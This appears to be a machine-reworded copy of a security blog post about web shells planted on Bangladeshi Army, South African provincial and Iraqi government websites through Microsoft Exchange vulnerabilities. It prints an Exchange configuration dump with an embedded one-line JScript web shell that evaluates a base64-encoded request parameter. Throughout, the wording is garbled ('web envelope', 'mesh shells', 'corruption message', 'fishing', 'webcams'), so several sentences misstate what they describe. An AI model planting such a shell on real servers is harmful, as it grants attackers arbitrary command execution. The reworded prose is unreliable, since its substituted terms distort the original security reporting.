Netcraft recently confirmed that a Bangladeshi Army website hosts an Outlook Web Access (OWA) web envelope. In addition, an OWA web envelope was found on the Arts and Culture Department website for the South African province of KwaZulu-Natal, and the Iraqi government website was found to host a PHP envelope. Web shells are a common tool used by attackers to maintain control of a compromised web server, and provide a web interface from which arbitrary commands can be executed on the server hosting the shell. OWA provides remote access to Microsoft Exchange mailboxes; Since the exposure of the ProxyLogon vulnerabilities In March, Microsoft Exchange became a popular target for cyber attacks.
When using a browser to visit the web envelope installed on the Arts and Culture Department website, the malicious activity was not immediately apparent as the envelope impersonated a changing dump. Web shells are most often buried in the file system alongside benign files, making it difficult for webmasters to identify and download them. Even after repairing the vulnerabilities used to install the shell, the shell itself must also be removed to stop further malicious activity. Websites that contain web shells can often remain at risk for long periods of time.
AdminDisplayVersion : Version 15.1 (Build 2106.2)
Server : REDACTED
InternalUrl : https://REDACTED.local/OAB
InternalAuthenticationMethods : WindowsIntegrated
ExternalUrl : http://f/<script language="JScript" runat="server">
function Page_Load()eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(
Request.Item["REDACTED"])),"unsafe");</script>
ExternalAuthenticationMethods : WindowsIntegrated
AdminDisplayName :
ExchangeVersion : 0.10 (14.0.100.0)
DistinguishedName : REDACTED
Identity : REDACTEDOAB (Default Web Site)
Guid : REDACTED
ObjectCategory : REDACTED/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass : top
The source code for a similar OWA web envelope is shown above. Near the middle of the file is a line of code that allows an attacker to execute an arbitrary command that is passed as a request parameter. For more information on OWA web shells and how to blur them, check out our blog post about ProxyLogon shells.
Mesh shells on South African government sites are not a new phenomenon. Netcraft has previously identified 7 OWA web shells in host names below gov.za
, As well as PHP web envelope. Next to the PHP web envelope on the South African government website was a corruption message. This corruption report was identical to the one found on a hacked website linked to the Iraqi government, baghdadairport.gov.iq. This post publishes the criminals involved in the two compromises, and in the ICQ account that offers the sale of internet shells. The PHP web envelope has now been removed, but the corruption remains. When the web envelope was present, a visitor baghdadairport.gov.iq In the browser revealed a login page that characterizes the WSO family (“web shell by oRb”).
Bangladesh Army Site (newmail.army.mil.bd) Is also found as an OWA web shell hosted using ProxyShell vulnerabilities. This envelope takes the form of an ASPX file starting with !BDN
, The file signature for the Microsoft Outlook Personal Storage Table (PST) file, indicating that the envelope was installed using ProxyShell Vulnerabilities Revealed earlier this year.
The nature of mesh shells makes their identification a difficult task, as they are installed on obscure paths and provide outputs that look benign. Fortunately, Netcraft is well equipped to deal with this problem. We provide cybercrime disruption services to 7 governments, and regularly scan the Internet for malicious content including webcams and malware. Hosting providers can accept Alert service From Netcraft which will notify them whenever fishing, malware or web shells are detected in their infrastructure. Organizations targeted by high-volume fishing managed using web shells can use Netcraft’s countermeasures service Disrupt the attacks.